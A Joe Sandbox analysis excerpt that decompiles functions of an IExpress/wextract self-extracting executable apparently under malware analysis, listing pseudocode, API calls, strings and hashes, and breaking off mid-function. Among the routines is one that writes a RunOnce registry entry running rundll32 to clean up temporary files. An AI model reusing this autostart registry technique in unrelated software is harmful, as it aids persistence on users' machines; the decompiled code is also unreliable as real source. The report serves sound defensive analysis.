												if(( *0xfc9a34 & 0x00000100) == 0 || ( *0xfc8a38 & 0x00000001) != 0 || E00FC18A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00FC6517(_t57, 0x7d6, _t34, E00FC19E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00FC2390(0xfc8a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E00FC44B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E00FC468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0xfc8588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0xfc9a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E00FC44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E00FC44B9(0, 0x54b, "doza2", 0, 0x10, 0);
										L11:
										CloseHandle( *0xfc8588);
										 *0xfc9124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E00FC44B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0xfc9124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00FC6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}

0x00fc2cb5
0x00fc2cbc
0x00fc2cc7
0x00fc2cc9
0x00fc2cd1
0x00fc2cd3
0x00fc2cd9
0x00fc2ce9
0x00fc2cf9
0x00fc2d0e
0x00fc2d15
0x00fc2d1c
0x00fc2ef3
0x00000000
0x00fc2d2d
0x00fc2d34
0x00fc2d3b
0x00fc2d40
0x00fc2d48
0x00fc2d59
0x00fc2d84
0x00fc2e1f
0x00fc2e1f
0x00fc2e2e
0x00fc2e41
0x00fc2e5a
0x00fc2e62
0x00fc2e6c
0x00fc2e6c
0x00fc2e75
0x00fc2e77
0x00fc2e77
0x00fc2e84
0x00fc2e8b
0x00fc2e94
0x00000000
0x00fc2e96
0x00fc2e96
0x00fc2e9e
0x00fc2ea2
0x00fc2eba
0x00000000
0x00fc2ece
0x00fc2ede
0x00fc2eed
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc2eed
0x00fc2eef
0x00fc2eef
0x00fc2eef
0x00fc2eef
0x00fc2ea2
0x00fc2e86
0x00fc2e88
0x00fc2e88
0x00fc2e43
0x00fc2e48
0x00000000
0x00fc2e48
0x00fc2e30
0x00fc2e30
0x00fc2ef8
0x00fc2f01
0x00000000
0x00fc2f01
0x00fc2d8a
0x00fc2d8f
0x00fc2da1
0x00000000
0x00fc2da3
0x00fc2dae
0x00fc2db4
0x00fc2dbb
0x00000000
0x00fc2dca
0x00fc2dd3
0x00fc2df5
0x00fc2e02
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc2dd5
0x00fc2dde
0x00fc2de3
0x00fc2e04
0x00fc2e0a
0x00fc2e10
0x00000000
0x00fc2e10
0x00fc2dd3
0x00fc2dbb
0x00fc2da1
0x00fc2d5b
0x00fc2d5b
0x00fc2d5d
0x00fc2d69
0x00fc2d6e
0x00fc2f06
0x00fc2f06
0x00fc2f06
0x00fc2d59
0x00fc2f18

APIs

memset.MSVCRT ref: 00FC2CD9
memset.MSVCRT ref: 00FC2CE9
memset.MSVCRT ref: 00FC2CF9

Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46A0
Part of subcall function 00FC468F: SizeofResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46A9
Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46C3
Part of subcall function 00FC468F: LoadResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46CC
Part of subcall function 00FC468F: LockResource.KERNEL32(00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46D3
Part of subcall function 00FC468F: memcpy_s.MSVCRT ref: 00FC46E5
Part of subcall function 00FC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC2D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC2D40
CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC2DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00FC2DBD
CloseHandle.KERNEL32(doza2,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC2E0A

Part of subcall function 00FC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FC4518
Part of subcall function 00FC44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00FC4554

Strings

doza2, xrefs: 00FC2D04, 00FC2DD9, 00FC2DF0
TITLE, xrefs: 00FC2D09
EXTRACTOPT, xrefs: 00FC2D4D
VERCHECK, xrefs: 00FC2E54
INSTANCECHECK, xrefs: 00FC2D95

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$doza2
API String ID: 1002816675-859929227
Opcode ID: 5d52a047185700c22c21826fe752cae1fb44895bd55fc764ec50f7d8b97766d2
Instruction ID: e979c86bc0e8f2aa7ff9c34fa61677393b7f82d456f5becdb06b39dcb9d7c6e3
Opcode Fuzzy Hash: 5d52a047185700c22c21826fe752cae1fb44895bd55fc764ec50f7d8b97766d2
Instruction Fuzzy Hash: B351F770B4430B6AE7A4A7218F4BF7B3698EB85760F04402DF941E61D5DBF8D841FA21

Uniqueness

Uniqueness Score: -1.00%

Function 00FC34F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00FC34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0xfc91d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0xfc8584 = _t35;
					E00FC43D0(_t35, GetDesktopWindow());
					__eflags =  *0xfc8184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "doza2");
					_t17 = CreateThread(0, 0, E00FC4FE0, 0, 0, 0xfc8798);
					 *0xfc879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E00FC44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0xfc858c);
					_t38 =  *0xfc8584; // 0x0
					_t25 = E00FC44B9(_t38, 0x4b2, 0xfc1140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0xfc91d8 = 1;
						SetEvent( *0xfc858c);
						_t39 =  *0xfc879c; // 0x0
						E00FC3680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0xfc858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0xfc879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}

0x00fc34fb
0x00fc34fe
0x00fc3665
0x00fc3666
0x00fc3666
0x00fc3668
0x00fc366e
0x00fc366e
0x00fc3671
0x00fc3671
0x00fc3677
0x00000000
0x00fc3677
0x00fc3504
0x00fc3506
0x00fc3507
0x00fc350c
0x00fc365b
0x00fc365f
0x00000000
0x00000000
0x00000000
0x00fc3661
0x00fc3512
0x00fc3515
0x00fc35be
0x00fc35c1
0x00fc35d1
0x00fc35d8
0x00fc35de
0x00fc35f8
0x00fc3617
0x00fc3617
0x00fc3623
0x00fc3637
0x00fc363d
0x00fc3642
0x00fc3644
0x00000000
0x00fc3646
0x00fc3652
0x00fc3657
0x00fc3658
0x00000000
0x00fc3658
0x00fc3644
0x00fc351b
0x00fc351d
0x00fc354f
0x00fc3553
0x00000000
0x00000000
0x00fc355f
0x00fc3565
0x00fc357c
0x00fc3581
0x00fc3584
0x00fc359b
0x00fc35a1
0x00fc35a7
0x00fc35ad
0x00fc35b3
0x00fc35b8
0x00000000
0x00fc35b8
0x00fc3586
0x00fc3588
0x00000000
0x00000000
0x00fc3590
0x00000000
0x00fc3590
0x00fc3524
0x00fc3535
0x00fc3541
0x00000000
0x00fc3549
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 00FC3535
EndDialog.USER32(?,?), ref: 00FC3541
ResetEvent.KERNEL32 ref: 00FC355F
SetEvent.KERNEL32(00FC1140,00000000,00000020,00000004), ref: 00FC3590
GetDesktopWindow.USER32 ref: 00FC35C7
GetDlgItem.USER32(?,0000083B), ref: 00FC35F1
SendMessageA.USER32(00000000), ref: 00FC35F8
GetDlgItem.USER32(?,0000083B), ref: 00FC3610
SendMessageA.USER32(00000000), ref: 00FC3617
SetWindowTextA.USER32(?,doza2), ref: 00FC3623
CreateThread.KERNEL32 ref: 00FC3637
EndDialog.USER32(?,00000000), ref: 00FC3671

Strings

doza2, xrefs: 00FC361D

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: doza2
API String ID: 2406144884-612509477
Opcode ID: fe92b140033d836157d4d6abf21a9d8030bf64d1c8407e4fd29b96c83d7ace44
Instruction ID: 08441bb703784dec0d123d4b1aa52142b977f57894fd9da8056b21222eecb8e8
Opcode Fuzzy Hash: fe92b140033d836157d4d6abf21a9d8030bf64d1c8407e4fd29b96c83d7ace44
Instruction Fuzzy Hash: 3231B33164031BBBD7201F25AF1FF2A3A68E785B94F18891DF602972A0CA75A911FF51

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00FC4224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E00FC44B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0xfc88c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0xfc87a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0xfc8598;
					_v36 = 1;
					_v32 = E00FC4200;
					_v28 = 0xfc88c0;
					 *0xfca288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0xfca288(_t32, 0xfc88c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0xfc88c0 != 0) {
							E00FC1680(0xfc87a0, 0x104, 0xfc88c0);
						}
						 *0xfca288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0xfc87a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0xfc88c0);
					_t61 = 0xfc88c0;
					_t4 =  &(_t61[1]); // 0xfc88c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0xfc88c0; // 0x1f91181
					_t44 = CharPrevA(0xfc88c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0xfc88c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

0x00fc4234
0x00fc423c
0x00fc4240
0x00fc43b2
0x00fc43b7
0x00fc43c0
0x00000000
0x00fc43c5
0x00fc424c
0x00fc4252
0x00fc4257
0x00fc43a4
0x00fc43a5
0x00fc43ab
0x00000000
0x00fc43ab
0x00fc4263
0x00fc4269
0x00fc426e
0x00000000
0x00000000
0x00fc427a
0x00fc4280
0x00fc4285
0x00000000
0x00000000
0x00fc428d
0x00fc4293
0x00fc42e6
0x00fc42e9
0x00fc42ef
0x00fc42f4
0x00fc42f7
0x00fc4300
0x00fc4307
0x00fc430e
0x00fc4315
0x00fc431c
0x00fc4322
0x00fc4326
0x00fc432d
0x00fc432d
0x00fc432f
0x00fc4334
0x00fc4343
0x00fc4349
0x00fc434d
0x00fc4354
0x00fc4354
0x00fc435d
0x00fc436e
0x00fc436e
0x00fc437d
0x00fc4383
0x00fc4387
0x00fc438e
0x00fc438e
0x00fc4387
0x00fc4391
0x00fc4399
0x00000000
0x00fc4295
0x00fc429f
0x00fc42a5
0x00fc42aa
0x00fc42aa
0x00fc42ad
0x00fc42ad
0x00fc42af
0x00fc42b0
0x00fc42b6
0x00fc42c2
0x00fc42c8
0x00fc42ce
0x00fc42e4
0x00fc42e4
0x00000000
0x00fc42ce

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00FC4236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00FC424C
GetProcAddress.KERNEL32(00000000,000000C3), ref: 00FC4263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00FC427A
GetTempPathA.KERNEL32(00000104,00FC88C0,?,00000001), ref: 00FC429F
CharPrevA.USER32(00FC88C0,01F91181,?,00000001), ref: 00FC42C2
CharPrevA.USER32(00FC88C0,00000000,?,00000001), ref: 00FC42D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00FC4391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00FC43A5

Strings

SHGetPathFromIDList, xrefs: 00FC4274
SHBrowseForFolder, xrefs: 00FC4246
SHELL32.DLL, xrefs: 00FC422F

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: c0e2d78f618edb43c41126ca2f09172d79514a184e029b678b832ef327d40cec
Instruction ID: e149953d6190ebbe69e5e9ab20b85b40211971979b125e44e6534bcf2a16fc95
Opcode Fuzzy Hash: c0e2d78f618edb43c41126ca2f09172d79514a184e029b678b832ef327d40cec
Instruction Fuzzy Hash: 5D41E474E0024AAFD7119B70DEABFAE7BB4EB45394F04016DE941A3291CB74AC02F761

Uniqueness

Uniqueness Score: -1.00%

Function 00FC2773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00FC2773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00FC1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E00FC658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E00FC658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0xfc1140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00FC1680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00FC6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

0x00fc2773
0x00fc277e
0x00fc2785
0x00fc278a
0x00fc278d
0x00fc2790
0x00fc2792
0x00fc2798
0x00fc279d
0x00fc28b2
0x00000000
0x00fc27a3
0x00fc27a3
0x00fc27af
0x00fc27c2
0x00fc27c8
0x00fc27cd
0x00fc27d5
0x00fc28b7
0x00fc28b9
0x00000000
0x00fc27db
0x00fc27dd
0x00fc28aa
0x00000000
0x00fc27e3
0x00fc27e3
0x00fc27ec
0x00fc27f8
0x00fc2803
0x00fc280b
0x00fc2831
0x00fc28c3
0x00fc28c9
0x00fc28cd
0x00fc2837
0x00fc285a
0x00fc285c
0x00fc2865
0x00fc2892
0x00fc2895
0x00000000
0x00000000
0x00fc2867
0x00fc2878
0x00fc288c
0x00000000
0x00fc287a
0x00fc2880
0x00fc2885
0x00fc2897
0x00fc2899
0x00fc2899
0x00fc2878
0x00fc2865
0x00fc28a0
0x00fc28bf
0x00fc28c1
0x00000000
0x00000000
0x00fc28c1
0x00fc2831
0x00fc27dd
0x00fc27d5
0x00fc28e5

APIs

CharUpperA.USER32(D6D6FCA6,00000000,00000000,00000000), ref: 00FC27A8
CharNextA.USER32(0000054D), ref: 00FC27B5
CharNextA.USER32(00000000), ref: 00FC27BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FC2829
RegQueryValueExA.ADVAPI32(?,00FC1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FC2852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FC2870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FC28A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00FC28AA
GetSystemDirectoryA.KERNEL32 ref: 00FC28B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00FC27E4

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: 09d03e47b8f18a22ef6d1a84836d062fde92576a097bcc5307abd9f55408753a
Instruction ID: fcb4559181d3dbf59c61347cf3a0b362dacd954e7f46da9bafbcde43dfe3bf7b
Opcode Fuzzy Hash: 09d03e47b8f18a22ef6d1a84836d062fde92576a097bcc5307abd9f55408753a
Instruction Fuzzy Hash: 4141C171E0012DAFDB249B249E86FEA7BBCEB15310F0400AAF545D2140CB749E85AFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FC2267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00FC2267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0xfc8004; // 0xd6d6fca6
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0xfc8530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E00FC658A( &_v268, 0x104, 0xfc1140);
							}
							_push("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
							E00FC171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup2", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00FC6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}

0x00fc2272
0x00fc2277
0x00fc2279
0x00fc2283
0x00fc2289
0x00fc22ab
0x00fc22b1
0x00fc22c4
0x00fc22e0
0x00fc22e6
0x00fc22f5
0x00fc230d
0x00fc231c
0x00fc231c
0x00fc2321
0x00fc233a
0x00fc2342
0x00fc2348
0x00fc234b
0x00fc234c
0x00fc234c
0x00fc234e
0x00fc234f
0x00fc236e
0x00fc236e
0x00fc237a
0x00fc2380
0x00fc2380
0x00fc2381
0x00fc2381
0x00fc238f

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00FC22A3
RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 00FC22D8
memset.MSVCRT ref: 00FC22F5
GetSystemDirectoryA.KERNEL32 ref: 00FC2305
RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00FC236E
RegCloseKey.ADVAPI32(?), ref: 00FC237A

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00FC2321
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00FC2299
wextract_cleanup2, xrefs: 00FC227C, 00FC22CD, 00FC2363
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00FC232D

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
API String ID: 3027380567-1720115735
Opcode ID: aa7aed400dbf3021b8708fb0e586557cbc81758f6f8a577ecd176ed7ef797a9f
Instruction ID: b3fc3e64cde0698736bb07a79ed55e701832778493164c90f80e276749488666
Opcode Fuzzy Hash: aa7aed400dbf3021b8708fb0e586557cbc81758f6f8a577ecd176ed7ef797a9f
Instruction Fuzzy Hash: EC31E371A0021DABDB219B20DE4BFEA7B7CEF54750F0401ADB50DE7041EA75AB89EA50

Uniqueness

Uniqueness Score: -1.00%

Function 00FC3100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00FC3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0xfc8590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0xfc8590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E00FC43D0(_t33, _t16);
